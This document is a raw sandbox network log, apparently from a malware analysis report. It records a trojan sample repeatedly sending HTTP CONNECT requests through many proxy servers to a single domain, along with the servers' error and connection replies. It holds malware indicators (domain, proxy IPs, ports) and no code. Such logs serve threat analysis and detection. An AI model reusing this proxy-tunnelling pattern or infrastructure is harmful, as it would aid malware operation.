                                                                                Feb 23, 2024 14:28:55.304156065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:00.007224083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1821192.168.2.855255113.143.37.8290025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.330337048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.713476896 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1822192.168.2.8553065.44.42.82108085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.388876915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1823192.168.2.854956184.170.245.14841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.394439936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1824192.168.2.854998103.230.126.123605115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.456548929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.491862059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.492408991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.601263046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:05.600943089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1825192.168.2.85531464.43.89.12863875828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.472070932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.828592062 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1826192.168.2.855134142.54.232.641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.512702942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1827192.168.2.854231145.239.2.102421475828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.615303040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.179411888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1828192.168.2.854548162.214.162.180551895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.627590895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.679358006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1829192.168.2.855316175.183.82.22181975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.640417099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1830192.168.2.85197495.143.12.201605055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.640891075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1831192.168.2.85195682.146.37.145805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.640892029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.679371119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.694964886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:07.400958061 CET831INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:29:07 GMT
                                                                                Server: Apache/2.4.52 (Debian)
                                                                                Content-Length: 639
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Debian) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1832192.168.2.855349172.67.182.22805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.646466017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.737096071 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1833192.168.2.85531581.69.243.12610805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.682828903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1834192.168.2.854640148.72.177.90632185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.701282024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.064801931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.398325920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.065846920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.289261103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.695219040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.507255077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1835192.168.2.85523782.97.215.240805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.718107939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.065702915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288937092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1836192.168.2.855340193.239.56.8480815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.752298117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1837192.168.2.855091184.178.172.1441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.752454996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1838192.168.2.855342212.31.100.13841535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.753680944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1839192.168.2.85534180.80.162.81108055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.753931999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1840192.168.2.854630109.107.181.245300525828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.754117012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1841192.168.2.8553273.112.35.20831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.754460096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.053735018 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1842192.168.2.854912171.248.222.6010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.837982893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1843192.168.2.855096213.170.117.15080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.838150024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.991758108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1844192.168.2.85214085.172.0.3080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.838632107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.991770983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1845192.168.2.855100158.181.22.13980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.848592997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.991967916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1846192.168.2.854530160.251.19.2331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.857856035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1847192.168.2.8553398.217.118.156805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.857965946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679289103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.695331097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.694957972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.382386923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.210566998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:56.882230043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.225943089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:16.132287979 CET60INHTTP/1.0 200 Connection Established
                                                                                Proxy-agent: Apache


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1848192.168.2.855357184.170.245.14841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.858622074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1849192.168.2.854564194.233.78.142390675828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.879169941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679447889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.882750988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.382709026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1850192.168.2.85536645.14.174.180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.891319036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.978791952 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
